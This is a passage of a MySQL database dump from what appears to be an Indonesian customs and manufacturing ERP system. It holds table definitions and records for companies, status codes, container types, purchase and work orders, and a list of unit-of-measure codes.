---------------------------- -- Records of mst_perusahaan -- ---------------------------- INSERT INTO mst_perusahaan VALUES ('CV. Jaya Mulya Mandiri', 'c', '02.356.631.8-431.000', 'Kp. Poncol Rt 006 Rw 002, Pasirsari, Cikarang Selatan, Bekasi, Jawa Barat', '', '', '', '', '', '', null, '', 'TLDDP', null, '', '', null, 'Mr. Rohman', '', '', null, '', '', '', '', '', 'TLDDP', '', '', 'Rp'); INSERT INTO mst_perusahaan VALUES ('PT. Hartono Istana Teknologi', 'c', '01.462.713.7-092.000', 'Jl. KHR. Asnawi PO BOX 126, Kaliwungu, Kudus-59332', '', '', '', '', '', '', null, '', 'TLDDP', null, '', '', null, 'Mrs. Silvy Hartono', '', '', null, '', '', '', '', '', 'TLDDP', '', '', 'USD'); INSERT INTO mst_perusahaan VALUES ('PT. INDAL', 's', '1', 'Jl.', null, '', '', 'ID', '', '', '0', '', '', null, '', null, null, '', null, '', '0000-00-00', null, null, null, null, null, null, null, null, null); INSERT INTO mst_perusahaan VALUES ('PT. JVC Electronics Indonesia', 'c', '01.071.863.3-055.000', 'Jl. Surya Lestari Kav.I-16B, Kota Industri Surya Cipta,Teluk Jambe - Karawang', '', '', '', '', '', '', null, '', '916/KM.4/2012 ', null, '', '', null, 'Mr. Halim Napitupulu', '', '', null, '', '', '', '', '', '050800', '', '', 'USD'); INSERT INTO mst_perusahaan VALUES ('PT. Katolec Indonesia', 'c', '01.081.601.5-055.000', 'Kawasan Industri EJIP Park Plot 8F, Cikarang Selatan, Bekasi, Jawa Barat', '', '', '', '', '', '', null, '', '', null, '', '', null, 'Mr. Eddy Cahyadi', '', '', null, '', '', '', '', '', '050900', '', '', 'USD'); INSERT INTO mst_perusahaan VALUES ('PT. Kawai Indonesia', 'c', '02.026.406.5-052.000', 'KIIC Jl. Maligi Raya Lot J-4A Jl. Tol JKT-Cikampek Km. 47, Teluk Jambe, Karawang-41361', '', '', '', '', '', '', null, '', '1115/KM.4/2012 ', null, '', '', null, 'Mrs. Wati', '', '', null, '', '', '', '', '', '050800', '', '', 'USD'); INSERT INTO mst_perusahaan VALUES ('PT. Matsuzawa Pelita Furniture Indonesia', 'c', '01.081.626.2-433.000', 'Desa Cimahi Klari, Klari, Karawang - 41371', '', '', '', '', '', '', null, '', '177/KMK/04/2004', null, '', '', null, 'Mr. Agus Priyatna', '', '', null, '', '', '', '', '', '050800', '', '', 'USD'); INSERT INTO mst_perusahaan VALUES ('PT. Panasonic Gobel Eco Solutions Manufacturing I', 'c', '01.069.575.7-055.000', 'EJIP Industrial Park Plot 3D, Cikarang Selatan, Bekasi ', '', '', '', '', '', '', null, '', '1763/KM.4/2012', null, '', '', null, 'Mr. Nur Kholik', '', '', null, '', '', '', '', '', '050900', '', '', 'USD'); INSERT INTO mst_perusahaan VALUES ('PT. Panasonic Healthcare Indonesia', 'c', '01.081.576.9-055.000', 'Kawasan Industrial MM2100 Blok O-1, Gandamekar, Cikarang Barat, Bekasi, Jawa Barat-17520', '', '', '', '', '', '', null, '', '', null, '', '', null, 'Mr. M. Arifin Kasus', '', '', null, '', '', '', '', '', '050900', '', '', 'USD'); INSERT INTO mst_perusahaan VALUES ('PT. Panasonic Manufacturing Indonesia', 'c', '01.000.604.7-092.000', 'Jl. Raya Bogor Km 29, Pekayon-Pasar rebo, Jakarta-13710', '', '', '', '', '', '', null, '', '529/KMK.05/2000', null, '', '', null, 'Mr. Hendra', '', '', null, '', '', '', '', '', '040400', '', '', 'USD'); INSERT INTO mst_perusahaan VALUES ('PT. Paramount Bed Indonesia', 'c', '01.071.190.1-055.000', 'Block M-1-1 MM2100 Industrial Town Gandamekar - Cikarang Barat Bekasi 17550', '', '', '', '', '', '', null, '', 'TLDDP', null, '', '', null, 'Mr. Agung Pribadi', '', '', null, '', '', '', '', '', 'TLDDP', '', '', 'USD'); INSERT INTO mst_perusahaan VALUES ('PT. Sanken Indonesia', 'c', '01.824.407.9-055.000', 'Kawasan Industrial MM2100 Blok GG - 8 , Gandamekar, Cibitung - Bekasi 17520', '', '', '', '', '', '', null, '', '1616/KM.04/2012', null, '', '', null, 'Mrs. Yosy', '', '', null, '', '', '', '', '', '050900', '', '', 'USD'); INSERT INTO mst_perusahaan VALUES ('PT. SIIX EMS Indonesia', 'c', '03.090.051.8-408.000', 'Jl. Maligi VIII Lot S-4 Kawasan Industri KIIC, Margakaya, Telukjambe Barat, Karawang, Jawa Barat-413', '', '', '', '', '', '', null, '', '1225/KM.4/2011', null, '', '', null, 'Mrs. Risma', '', '', null, '', '', '', '', '', '050800', '', '', 'USD'); INSERT INTO mst_perusahaan VALUES ('PT. Toa Galindra Electronics', 'c', '02.519.860.7-055.000', 'Jl. Hayam Wuruk No. 27, Kebon kelapa, Gambir, Jakarta Pusat 10120', '', '', '', '', '', '', null, '', 'TLDDP', null, '', '', null, 'Mr. Afendy', '', '', null, '', '', '', '', '', 'TLDDP', '', '', 'USD'); INSERT INTO mst_perusahaan VALUES ('PT. Toa Galva Industries', 'c', '01.001.779.6-055.000', 'Jl. Hayam Wuruk No. 27, Kebon Kelapa, Gambir , Jakarta Pusat', '', '', '', '', '', '', null, '', '189/KM.04/2003', null, '', '', null, 'Mr. Endang Supriatna', '', '', null, '', '', '', '', '', '050300', '', '', 'USD'); INSERT INTO mst_perusahaan VALUES ('PT. Yamaha Electronics Manufacturing Indonesia', 'c', '01.869.240.0-055.000', 'Jl. Rembang Industri II / 9-11, Mojoparon - Rembang, Pasuruan 67152 ', '', '', '', '', '', '', null, '', 'S-523/BC-1999', null, '', '', null, 'Mr. Solahudin', '', '', null, '', '', '', '', '', '071300', '', '', 'USD'); INSERT INTO mst_perusahaan VALUES ('PT. Yamaha Music Manufacturing Asia', 'c', '01.824.284.2-052.000', 'Kawasan Industri MM2100 Blok EE-3, Cikarang Barat-Bekasi 17849', '', '', '', '', '', '', null, '', '47/KM.05/1998', null, '', '', null, 'Mr. K. Hilman', '', '', null, '', '', '', '', '', '050900', '', '', 'USD'); INSERT INTO mst_perusahaan VALUES ('PT. YAN JIN INDONESIA', 'o', '01.061.837.9-057.000', 'Kawasan EJIP Industrial Park Plot 8H Cikarang Selatan', '', 'Bekasi', 'Jawa Barat', 'Indonesia', '', '', '0', '', '865/KM.4/2010', '0000-00-00', '_', '102747857', '0000-00-00', 'Mr. Y. Tobusawa', '', '', null, '2', '536/APIT/198', '000000', '000192', '001269', '050800', '', '', 'Rp'); -- ---------------------------- -- Table structure for `mst_status` -- ---------------------------- DROP TABLE IF EXISTS `mst_status`; CREATE TABLE `mst_status` ( `KdStatus` varchar(2) NOT NULL DEFAULT '', `NmStatus` varchar(20) DEFAULT NULL, PRIMARY KEY (`KdStatus`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of mst_status -- ---------------------------- INSERT INTO mst_status VALUES ('10', 'Koperasi'); INSERT INTO mst_status VALUES ('20', 'PMDN (migas)'); INSERT INTO mst_status VALUES ('21', 'PMDN (non migas)'); INSERT INTO mst_status VALUES ('30', 'PMA (migas)'); INSERT INTO mst_status VALUES ('31', 'PMA (non migas)'); INSERT INTO mst_status VALUES ('40', 'BUMN'); INSERT INTO mst_status VALUES ('50', 'BUMD'); INSERT INTO mst_status VALUES ('60', 'Perorangan'); INSERT INTO mst_status VALUES ('90', 'Lainnya'); -- ---------------------------- -- Table structure for `mst_status_petikemas` -- ---------------------------- DROP TABLE IF EXISTS `mst_status_petikemas`; CREATE TABLE `mst_status_petikemas` ( `KdStPetiKemas` varchar(6) NOT NULL DEFAULT '', `NmStPetiKemas` varchar(20) DEFAULT NULL, `UrStPetiKemas` varchar(20) DEFAULT NULL, PRIMARY KEY (`KdStPetiKemas`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of mst_status_petikemas -- ---------------------------- INSERT INTO mst_status_petikemas VALUES ('1', 'FCL', 'Full Container Load'); INSERT INTO mst_status_petikemas VALUES ('2', 'LCL', 'Less Container Load'); INSERT INTO mst_status_petikemas VALUES ('3', 'Gabungan FCL dan LCL', 'Gabungan FCL dan LCL'); -- ---------------------------- -- Table structure for `penggunaanbarang` -- ---------------------------- DROP TABLE IF EXISTS `penggunaanbarang`; CREATE TABLE `penggunaanbarang` ( `DokKdBc` tinyint(1) NOT NULL DEFAULT '0', `CAR` varchar(6) NOT NULL DEFAULT '' COMMENT 'Nomor Pengajuan', `no` tinyint(2) NOT NULL COMMENT 'No. Urut', `KdJnsDok` tinyint(1) DEFAULT NULL, `NoAju` varchar(6) DEFAULT NULL, `NoUrut` tinyint(2) NOT NULL DEFAULT '0', `KdBarang` varchar(11) DEFAULT NULL, `UrBarang` varchar(100) DEFAULT NULL COMMENT 'Nomor Dokumen', `qty` int(11) DEFAULT NULL, `CIF` decimal(12,2) DEFAULT NULL COMMENT 'Nilai CIF', `BM` decimal(12,2) DEFAULT NULL, `Cukai` decimal(12,2) DEFAULT NULL, `PPN` decimal(12,2) DEFAULT NULL, `PPnBM` decimal(12,2) DEFAULT NULL, `PPh` decimal(12,2) DEFAULT NULL, PRIMARY KEY (`DokKdBc`,`CAR`,`no`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of penggunaanbarang -- ---------------------------- INSERT INTO penggunaanbarang VALUES ('3', '000001', '1', '1', '000700', '1', 'MAT-0001', 'tes', '1', '2.00', '1.00', '2.00', '1.00', '2.00', '1.00'); INSERT INTO penggunaanbarang VALUES ('3', '000003', '0', '0', '0000-0', '1', '0', '6103.90.9000', '0', '0.00', '3.00', null, '450.00', null, '300.00'); INSERT INTO penggunaanbarang VALUES ('3', '000004', '0', '0', '0000-0', '1', '0', '6103.90.9000', '0', '0.00', '3.00', null, '450.00', null, '300.00'); INSERT INTO penggunaanbarang VALUES ('3', '000005', '0', '0', '0000-0', '1', '0', '6103.90.9000', '0', '0.00', '3.00', null, '450.00', null, '300.00'); INSERT INTO penggunaanbarang VALUES ('3', '000006', '0', '0', '0000-0', '1', '0', '6103.90.9000', '0', '0.00', '3.00', null, '450.00', null, '300.00'); INSERT INTO penggunaanbarang VALUES ('3', '201..2', '1', '1', '000700', '1', 'MAT-0001', 'tes', '1', '2.00', '1.00', '2.00', '1.00', '2.00', '1.00'); INSERT INTO penggunaanbarang VALUES ('3', '201.20', '1', '1', '000700', '1', 'MAT-0001', 'tes', '1', '2.00', '1.00', '2.00', '1.00', '2.00', '1.00'); INSERT INTO penggunaanbarang VALUES ('3', '201207', '1', '1', '000700', '1', 'MAT-0001', 'tes', '1', '2.00', '1.00', '2.00', '1.00', '2.00', '1.00'); -- ---------------------------- -- Table structure for `penjamin` -- ---------------------------- DROP TABLE IF EXISTS `penjamin`; CREATE TABLE `penjamin` ( `ID` int(11) NOT NULL AUTO_INCREMENT, `NmPenjamin` varchar(50) DEFAULT NULL, PRIMARY KEY (`ID`) ) ENGINE=InnoDB AUTO_INCREMENT=9 DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of penjamin -- ---------------------------- INSERT INTO penjamin VALUES ('1', 'PT.ASURANSI MEGA PRATAMA'); INSERT INTO penjamin VALUES ('7', '1'); INSERT INTO penjamin VALUES ('8', ''); -- ---------------------------- -- Table structure for `ppic_fgmatcon` -- ---------------------------- DROP TABLE IF EXISTS `ppic_fgmatcon`; CREATE TABLE `ppic_fgmatcon` ( `matcon_id` varchar(20) NOT NULL COMMENT 'ID Material Consumption', `child_no` int(10) NOT NULL COMMENT 'Nomor Urut Detail', `mat_id` varchar(20) NOT NULL COMMENT 'ID Material', `qty` decimal(10,2) NOT NULL COMMENT 'Jumlah Pemakaian', PRIMARY KEY (`matcon_id`,`child_no`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of ppic_fgmatcon -- ---------------------------- INSERT INTO ppic_fgmatcon VALUES ('FBI-0001', '1', 'ALME0001', '0.01'); INSERT INTO ppic_fgmatcon VALUES ('FBI-0001', '2', 'ALME0003', '0.40'); INSERT INTO ppic_fgmatcon VALUES ('FBI-0001', '3', 'ALME0002', '0.04'); -- ---------------------------- -- Table structure for `ppic_wodet` -- ---------------------------- DROP TABLE IF EXISTS `ppic_wodet`; CREATE TABLE `ppic_wodet` ( `wo_id` int(10) NOT NULL, `child_no` int(10) NOT NULL, `fg_id` varchar(20) NOT NULL DEFAULT '0' COMMENT 'Nomor ID Finish Good', `qty_plan` decimal(12,2) NOT NULL, PRIMARY KEY (`wo_id`,`child_no`), CONSTRAINT `ppic_wodet_ibfk_1` FOREIGN KEY (`wo_id`) REFERENCES `ppic_wohdr` (`wo_id`) ON DELETE CASCADE ON UPDATE CASCADE ) ENGINE=InnoDB DEFAULT CHARSET=latin1 COMMENT='Detail Work Order'; -- ---------------------------- -- Records of ppic_wodet -- ---------------------------- INSERT INTO ppic_wodet VALUES ('3', '1', '123', '1.00'); -- ---------------------------- -- Table structure for `ppic_wohdr` -- ---------------------------- DROP TABLE IF EXISTS `ppic_wohdr`; CREATE TABLE `ppic_wohdr` ( `wo_id` int(10) NOT NULL AUTO_INCREMENT, `wo_no` varchar(20) NOT NULL, `wo_date` date NOT NULL, `so_id` int(10) NOT NULL, `expplan_date` date NOT NULL COMMENT 'Tanggal Ekspor Rencana', `tot_qty` decimal(9,2) NOT NULL, `notes` varchar(80) NOT NULL, PRIMARY KEY (`wo_id`) ) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=latin1 COMMENT='Header Work Order'; -- ---------------------------- -- Records of ppic_wohdr -- ---------------------------- INSERT INTO ppic_wohdr VALUES ('3', '002', '2012-09-19', '25', '2012-09-20', '1.00', 'sial'); -- ---------------------------- -- Table structure for `pur_podet` -- ---------------------------- DROP TABLE IF EXISTS `pur_podet`; CREATE TABLE `pur_podet` ( `po_id` int(10) NOT NULL DEFAULT '0' COMMENT 'Nomor ID Transaksi P/O ke Supplier', `child_no` int(10) NOT NULL DEFAULT '0' COMMENT 'Nomor Item Detail Transaksi', `mat_id` varchar(20) NOT NULL DEFAULT '0' COMMENT 'Nomor Id Material', `qty` decimal(9,2) NOT NULL DEFAULT '0.00' COMMENT 'Jumlah Qty saat pemesanan', `price` decimal(19,2) NOT NULL DEFAULT '0.00' COMMENT 'Jumlah Harga Satuan Barang', PRIMARY KEY (`po_id`,`child_no`), CONSTRAINT `pur_podet_ibfk_1` FOREIGN KEY (`po_id`) REFERENCES `pur_pohdr` (`po_id`) ON DELETE CASCADE ON UPDATE CASCADE ) ENGINE=InnoDB DEFAULT CHARSET=latin1 COMMENT='Detail Transaksi Pemesanan Barang'; -- ---------------------------- -- Records of pur_podet -- ---------------------------- INSERT INTO pur_podet VALUES ('3', '1', 'TESMAT-2', '2.00', '2.00'); INSERT INTO pur_podet VALUES ('4', '1', 'TESMAT-1', '1.00', '2.00'); INSERT INTO pur_podet VALUES ('5', '1', 'ALME0002', '200.00', '100.00'); INSERT INTO pur_podet VALUES ('6', '1', 'M001', '100.00', '200.00'); INSERT INTO pur_podet VALUES ('6', '2', 'P001', '200.00', '100.00'); -- ---------------------------- -- Table structure for `pur_pohdr` -- ---------------------------- DROP TABLE IF EXISTS `pur_pohdr`; CREATE TABLE `pur_pohdr` ( `po_id` int(10) NOT NULL AUTO_INCREMENT COMMENT 'Nomor ID Transaksi P/O ke Supplier', `po_type` enum('0','1') DEFAULT '0' COMMENT '0=po normal, 1=po return', `po_no` varchar(20) NOT NULL DEFAULT '' COMMENT 'Nomor Transaksi Pesanan', `po_date` date NOT NULL COMMENT 'Tanggal dan Jam Pemesanan', `ref_id` int(10) DEFAULT NULL, `ref_no` varchar(20) DEFAULT NULL, `supplier` varchar(50) NOT NULL COMMENT 'Kode Supplier Tujuan', `attn` varchar(40) NOT NULL DEFAULT '' COMMENT 'Contact Person Supplier', `currency` varchar(3) NOT NULL DEFAULT 'IDR', `dlv_date` datetime NOT NULL COMMENT 'Tanggal Barang akan Dikirim', `wh_id` int(2) DEFAULT NULL, `notes` varchar(80) NOT NULL DEFAULT '' COMMENT 'Catatan Transaksi Pesanan', `sub_total` decimal(19,2) NOT NULL COMMENT 'Total field ''amount_po'' pada tabel detailnya', `disc_pct` decimal(5,2) NOT NULL COMMENT 'Persentase Diskon', `disc_amt` decimal(15,2) NOT NULL COMMENT 'Nilai Diskon', `ppn` decimal(10,2) NOT NULL, `tot_qty` decimal(10,2) NOT NULL COMMENT 'Nilai setelah dikurangi Diskon, ditambah PPn', `tot_amount` decimal(12,2) DEFAULT NULL, `terms` varchar(30) NOT NULL DEFAULT '1', `spec` varchar(50) DEFAULT NULL, `width_tol` varchar(20) DEFAULT NULL, `thick_tol` varchar(20) DEFAULT NULL, `Wrmax` int(10) DEFAULT NULL, `remark` varchar(50) DEFAULT NULL, `auth_sign` varchar(30) DEFAULT NULL, PRIMARY KEY (`po_id`) ) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=latin1 COMMENT='Header Transaksi Pesanan Material ke Supplier'; -- ---------------------------- -- Records of pur_pohdr -- ---------------------------- INSERT INTO pur_pohdr VALUES ('3', '1', '1', '2012-08-31', '2', '222', 'PT. ALUMINDO LIGHT METAL INDUSTRY', '2', 'USD', '2012-08-31 00:00:00', '1', '2', '0.00', '0.00', '0.00', '1.00', '0.00', null, '1', '1', '1', '1', '1', '2', '2'); INSERT INTO pur_pohdr VALUES ('4', '1', '2', '2012-08-31', '1', '111', 'PT. INDAL ALUMINIUM INDUSTRY - DIV. ISS', '1', 'USD', '2012-08-31 00:00:00', '1', '1', '0.00', '0.00', '0.00', '2.00', '0.00', null, '2', '2', '1', '1', '1', '2', '2'); INSERT INTO pur_pohdr VALUES ('5', '0', '001', '2012-08-06', null, null, 'PT. ALUMINDO LIGHT METAL INDUSTRY', '1', 'USD', '2012-09-13 00:00:00', '1', '3', '0.00', '0.00', '0.00', '10.00', '0.00', null, '2', '4', '6', '7', '9', '8', '10'); INSERT INTO pur_pohdr VALUES ('6', '0', '002', '2012-10-28', null, null, 'PT. DIHEN BERSAMA', 'Kikin', 'Rp', '2012-10-31 00:00:00', '0', 'Just a test', '0.00', '0.00', '0.00', '10.00', '0.00', null, 'tes', '', '', '', '0', '', ''); -- ---------------------------- -- Table structure for `satuan` -- ---------------------------- DROP TABLE IF EXISTS `satuan`; CREATE TABLE `satuan` ( `KdSat` varchar(3) NOT NULL DEFAULT '' COMMENT 'Kode Satuan', `UrSat` varchar(30) DEFAULT NULL COMMENT 'Uraian Satuan', PRIMARY KEY (`KdSat`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of satuan -- ---------------------------- INSERT INTO satuan VALUES ('ACR', 'Acre (4840 yd2)'); INSERT INTO satuan VALUES ('AMH', 'Ampere-hour (3,6 kC)'); INSERT INTO satuan VALUES ('AMP', 'Ampere'); INSERT INTO satuan VALUES ('ANN', 'Year'); INSERT INTO satuan VALUES ('APZ', 'Ounce GB,US (31,10348 g)'); INSERT INTO satuan VALUES ('ARE', 'Are (100m2)'); INSERT INTO satuan VALUES ('ATM', 'Standard atmosphere (101325 Pa'); INSERT INTO satuan VALUES ('ATT', 'Technical atmosphere (98066,5 '); INSERT INTO satuan VALUES ('BAR', 'Bar'); INSERT INTO satuan VALUES ('BIL', 'Trillion US / Billion'); INSERT INTO satuan VALUES ('BLD', 'Dry barrel (115,627 dm3)'); INSERT INTO satuan VALUES ('BLL', 'Barrel (petroleum) (458,987 dm'); INSERT INTO satuan VALUES ('BUA', 'Bushel (35,2391 dm3)'); INSERT INTO satuan VALUES ('BUI', 'Bushel (36,36874 dm3)'); INSERT INTO satuan VALUES ('CCT', 'Carrying capacity in metric to'); INSERT INTO satuan VALUES ('CDL', 'Candela'); INSERT INTO satuan VALUES ('CEL', 'Degree celcius'); INSERT INTO satuan VALUES ('CEN', 'Hundred'); INSERT INTO satuan VALUES ('CKG', 'Coulomb per kilogram'); INSERT INTO satuan VALUES ('CLT', 'Centilitre'); INSERT INTO satuan VALUES ('CMK', 'Square centimetre'); INSERT INTO satuan VALUES ('CMQ', 'Cubic centimetre'); INSERT INTO satuan VALUES ('CMT', 'Centimetre'); INSERT INTO satuan VALUES ('CNP', 'Hundred packs'); INSERT INTO satuan VALUES ('CNT', 'Cental GB (45,359237 kg)'); INSERT INTO satuan VALUES ('COU', 'Coulomb'); INSERT INTO satuan VALUES ('CTM', 'Metric carat (200 mg = 2.10-4 '); INSERT INTO satuan VALUES ('CWA', 'Hundredweight, US (45,3592 kg)'); INSERT INTO satuan VALUES ('CWI', 'Long/ hundredweight GB (50,802'); INSERT INTO satuan VALUES ('DAA', 'Decare'); INSERT INTO satuan VALUES ('DAD', 'Ten day'); INSERT INTO satuan VALUES ('DAY', 'Day'); INSERT INTO satuan VALUES ('DBC', 'Decade (ten years)'); INSERT INTO satuan VALUES ('DMK', 'Square decimetre'); INSERT INTO satuan VALUES ('DMQ', 'Cubic decimetre'); INSERT INTO satuan VALUES ('DMT', 'Decimetre'); INSERT INTO satuan VALUES ('DPR', 'Dozen pairs'); INSERT INTO satuan VALUES ('DPT', 'Displecement tonnege'); INSERT INTO satuan VALUES ('DRA', 'Dram US (3,887935 g)'); INSERT INTO satuan VALUES ('DRI', 'Dram GB (1,771745 g)'); INSERT INTO satuan VALUES ('DRL', 'Dozen rolls'); INSERT INTO satuan VALUES ('DRM', 'Drachm, GB (3,887935 g)'); INSERT INTO satuan VALUES ('DTN', 'Decitonne, Centner, Quintall, '); INSERT INTO satuan VALUES ('DWT', 'Pennyweight GB,US (1,555174 g)'); INSERT INTO satuan VALUES ('DZN', 'Dozen'); INSERT INTO satuan VALUES ('DZP', 'Dozen packs'); INSERT INTO satuan VALUES ('FAH', 'degree Fahrenheit'); INSERT INTO satuan VALUES ('FOT', 'Foot (0.3048 m)'); INSERT INTO satuan VALUES ('FTK', 'Square foot'); INSERT INTO satuan VALUES ('FTQ', 'Cubic foot'); INSERT INTO satuan VALUES ('GBQ', 'Gigabecquerel'); INSERT INTO satuan VALUES ('GGR', 'Great gross (12 gross)'); INSERT INTO satuan VALUES ('GIA', 'Gill (11,8294 cm3)'); INSERT INTO satuan VALUES ('GII', 'Gill (0,142065 dm3)'); INSERT INTO satuan VALUES ('GLD', 'Dry gallon (4,404884 dm3)'); INSERT INTO satuan VALUES ('GLI', 'Gallon (4,546092 dm3)'); INSERT INTO satuan VALUES ('GLL', 'Liquid gallon (3,78541 dm3)'); INSERT INTO satuan VALUES ('GRM', 'Gram'); INSERT INTO satuan VALUES ('GRN', 'Grain GB,US (64,798910 mg)'); INSERT INTO satuan VALUES ('GRO', 'Gross'); INSERT INTO satuan VALUES ('GRT', 'Gross (register) ton'); INSERT INTO satuan VALUES ('GWH', 'Gigawatt-hour (1 million KW/h)'); INSERT INTO satuan VALUES ('HAR', 'Hectare'); INSERT INTO satuan VALUES ('HBA', 'Hectobar'); INSERT INTO satuan VALUES ('HGM', 'Hectogram'); INSERT INTO satuan VALUES ('HIU', 'Hundred intenational units'); INSERT INTO satuan VALUES ('HLT', 'Hectolitre'); INSERT INTO satuan VALUES ('HMQ', 'Million cubic metres'); INSERT INTO satuan VALUES ('HMT', 'Hectometre'); INSERT INTO satuan VALUES ('HPA', 'Hectolitre of pure alcohol'); INSERT INTO satuan VALUES ('HTZ', 'Hertz'); INSERT INTO satuan VALUES ('HUR', 'Hour'); INSERT INTO satuan VALUES ('INH', 'Inch (2.54 mm)'); INSERT INTO satuan VALUES ('INK', 'Square inch'); INSERT INTO satuan VALUES ('INQ', 'Cubic inch'); INSERT INTO satuan VALUES ('JOU', 'Joule'); INSERT INTO satuan VALUES ('KBA', 'Kilobar'); INSERT INTO satuan VALUES ('KEL', 'Kelvin'); INSERT INTO satuan VALUES ('KG', 'Kilogram'); INSERT INTO satuan VALUES ('KJO', 'Kilojoule'); INSERT INTO satuan VALUES ('KMH', 'Kilometre per hour'); INSERT INTO satuan VALUES ('KMK', 'Square kilometre'); INSERT INTO satuan VALUES ('KMQ', 'Kilogram per cubic meter'); INSERT INTO satuan VALUES ('KMT', 'Kilometre'); INSERT INTO satuan VALUES ('KNI', 'Kilogram of nitrogen'); INSERT INTO satuan VALUES ('KNS', 'Kilogram of named substance'); INSERT INTO satuan VALUES ('KNT', 'Knot ( 1 n mile oer hour'); INSERT INTO satuan VALUES ('KPH', 'Kilogram of potassium hydroxid'); INSERT INTO satuan VALUES ('KPO', 'Kilogram of potassium oxide'); INSERT INTO satuan VALUES ('KPP', 'Kilogram of phosphorus pentoxi'); INSERT INTO satuan VALUES ('KSD', 'Kilogram of substance 90 per c'); INSERT INTO satuan VALUES ('KSH', 'Kilogram of sodium hydyoxide '); INSERT INTO satuan VALUES ('KTN', 'Kilotonne'); INSERT INTO satuan VALUES ('KUR', 'Kilogram of uranium'); INSERT INTO satuan VALUES ('KVA', 'Kilovolt - ampere'); INSERT INTO satuan VALUES ('KWH', 'Kilowatt-hour'); INSERT INTO satuan VALUES ('KWT', 'Kilowatt'); INSERT INTO satuan VALUES ('LBR', 'Pound GB,US (0,45359237 kg)'); INSERT INTO satuan VALUES ('LBT', 'Troy pound, US 9373,242 g)'); INSERT INTO satuan VALUES ('LNT', 'Long ton GB, US 2/ (1,0160469 '); INSERT INTO satuan VALUES ('LPA', 'Litre of pure alcohol'); INSERT INTO satuan VALUES ('LTR', 'Litre ( 1 dm3 )'); INSERT INTO satuan VALUES ('LUM', 'Lumen'); INSERT INTO satuan VALUES ('MAL', 'Megalitre'); INSERT INTO satuan VALUES ('MAM', 'Megametre'); INSERT INTO satuan VALUES ('MAW', 'Megawatt'); INSERT INTO satuan VALUES ('MGM', 'Milligram'); INSERT INTO satuan VALUES ('MID', 'Thousand'); INSERT INTO satuan VALUES ('MIK', 'Square mile'); INSERT INTO satuan VALUES ('MIN', 'Minute'); INSERT INTO satuan VALUES ('MIO', 'Million'); INSERT INTO satuan VALUES ('MIU', 'Million international units'); INSERT INTO satuan VALUES ('MLD', 'Milliard, Billion US'); INSERT INTO satuan VALUES ('MLT', 'Millilitre'); INSERT INTO satuan VALUES ('MMK', 'Square millimetre'); INSERT INTO satuan VALUES ('MMQ', 'Cubic millimetre'); INSERT INTO satuan VALUES ('MMT', 'Millimetre'); INSERT INTO satuan VALUES ('MON', 'Month'); INSERT INTO satuan VALUES ('MQH', 'cubic metre per hour'); INSERT INTO satuan VALUES ('MSK', 'Metre per second squared'); INSERT INTO satuan VALUES ('MTK', 'Square metre'); INSERT INTO satuan VALUES ('MTQ', 'Cubic metre'); INSERT INTO satuan VALUES ('MTR', 'Metre'); INSERT INTO satuan VALUES ('MVA', 'Megavolt - ampere (1000 KVA)'); INSERT INTO satuan VALUES ('MWH', 'Megawatt-hour (1000 KW/h)'); INSERT INTO satuan VALUES ('NAR', 'Number of articles'); INSERT INTO satuan VALUES ('NBB', 'Number bobbins'); INSERT INTO satuan VALUES ('NEW', 'Newton'); INSERT INTO satuan VALUES ('NIU', 'Number of international units'); INSERT INTO satuan VALUES ('NMB', 'Number'); INSERT INTO satuan VALUES ('NMI', 'Nautical mile (1852 m)'); INSERT INTO satuan VALUES ('NMP', 'Number of packs'); INSERT INTO satuan VALUES ('NPL', 'Number of parcels'); INSERT INTO satuan VALUES ('NPR', 'number of pairs'); INSERT INTO satuan VALUES ('NPT', 'Number of parts'); INSERT INTO satuan VALUES ('NRL', 'Number of rolls'); INSERT INTO satuan VALUES ('NTT', 'Net (regirter) ton'); INSERT INTO satuan VALUES ('OHM', 'Ohm'); INSERT INTO satuan VALUES ('ONZ', 'Ounce GB,US (28,349523 g)'); INSERT INTO satuan VALUES ('OZA', 'Fluid ounce (29,5735 cm3)'); INSERT INTO satuan VALUES ('OZI', 'Fluid ounce (29,5735 cm3)'); INSERT INTO satuan VALUES ('PAL', 'Pascal'); INSERT INTO satuan VALUES ('PCS', 'Pieces'); INSERT INTO satuan VALUES ('PGL', 'Proof gallon'); INSERT INTO satuan VALUES ('PTD', 'Dry pint (0.55061 dm3)'); INSERT INTO satuan VALUES ('PTI', 'Pint (0,568262 dm3)'); INSERT INTO satuan VALUES ('PTL', 'Liquid Pint (0,473176 dm3)'); INSERT INTO satuan VALUES ('QAN', 'Quarter (of a year)'); INSERT INTO satuan VALUES ('QTD', 'Dry quart (1,101221 dm3)'); INSERT INTO satuan VALUES ('QTI', 'Quart (1,136523 dm3)'); INSERT INTO satuan VALUES ('QTL', 'Liquid quart (0,946353 dm3)'); INSERT INTO satuan VALUES ('QTR', 'Quarter GB (12,700586 kg)'); INSERT INTO satuan VALUES ('RPM', 'Revolution per minute'); INSERT INTO satuan VALUES ('RPS', 'Revolution per second'); INSERT INTO satuan VALUES ('SAN', 'Half year (six Months)'); INSERT INTO satuan VALUES ('SCO', 'Score'); INSERT INTO satuan VALUES ('SCR', 'Scruple GP,US (1,295982 g)'); INSERT INTO satuan VALUES ('SEC', 'Second'); INSERT INTO satuan VALUES ('SET', 'Set'); INSERT INTO satuan VALUES ('SHT', 'Shipping ton'); INSERT INTO satuan VALUES ('SIE', 'Siemens'); INSERT INTO satuan VALUES ('SMI', 'Statute mile (1609.344 m)'); INSERT INTO satuan VALUES ('SST', 'Short standard (7200 matches '); INSERT INTO satuan VALUES ('STI', 'Stone GB (6,350293 kg)'); INSERT INTO satuan VALUES ('STN', 'Short ton GB, US 2/ (0,9071847'); INSERT INTO satuan VALUES ('TAH', 'Thousand ampere-hour'); INSERT INTO satuan VALUES ('TNE', 'Tonne, Metric ton (1000 kg)'); INSERT INTO satuan VALUES ('TPR', 'Ten pairs'); INSERT INTO satuan VALUES ('TQD', 'Thousand cubic metres per day'); INSERT INTO satuan VALUES ('TRL', 'Trillion Eur'); INSERT INTO satuan VALUES ('TSD', 'Tonne of subtance 90 per cent '); 